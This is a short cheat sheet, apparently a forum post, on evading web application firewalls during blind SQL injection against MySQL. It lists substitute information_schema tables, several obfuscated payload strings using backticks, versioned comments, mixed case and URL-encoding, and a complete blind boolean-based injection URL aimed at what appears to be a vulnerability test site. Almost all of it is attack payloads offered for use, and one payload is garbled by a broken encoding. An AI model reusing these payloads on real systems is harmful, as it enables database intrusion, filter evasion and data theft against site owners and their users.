ฺBlind sql injection Bypass Information_schema.tables && WAF

Bypass Information_schema.tables
  1. information_schema.statistics
  2. information_schema.key_column_usage
  3. information_schema.table_constraints
  4. information_schema.partitions
+
Bypass Firewall
  1. Using Spaces      : information_schema . tables
  2. Using Backticks  : `information_schema`.`tables`
  3. PHP Comment    : /*!information_schema.tables*/
=

`InFoRmATioN_ScHEmA%20.%20tables`
/*!InFoRmATioN_ScHEmA%20.%20StAtIsTiCs*/
`InFoRmATioN_ScHEmA%20.%20kEy_cOlUmN_uSaGe`
/*!InFoRmATioN_ScHEmA%20.%tAbLe_cOnStRaInTs*/
`InFoRmATioN_ScHEmA%20.%20PaRtItIoNs`




{
   /* Example Link to Exploit Sql injection Blind Based :D */

http://webscantest.com/datastore/search_get_by_id.php?id=3+/*!AnD*/+/*!aScII*/(MiD((/*!SeLecT*/+/*!tAbLe_NaMe*/+/*!FrOm*/+/*!InFoRmATioN_ScHEmA%20.%20tAbLe_cOnStRaInTs*/+limit+0,1),1,1))>0
}


if (return == true) {
   Ascii code(First Character of first table name  in
     Database :  information_schema
        Table       : TABLE_CONSTRAINTS
     Column    : TABLE_NAME) > 0
}





And other for rummage
https://dev.mysql.com/doc/refman/5.7/en/information-schema.html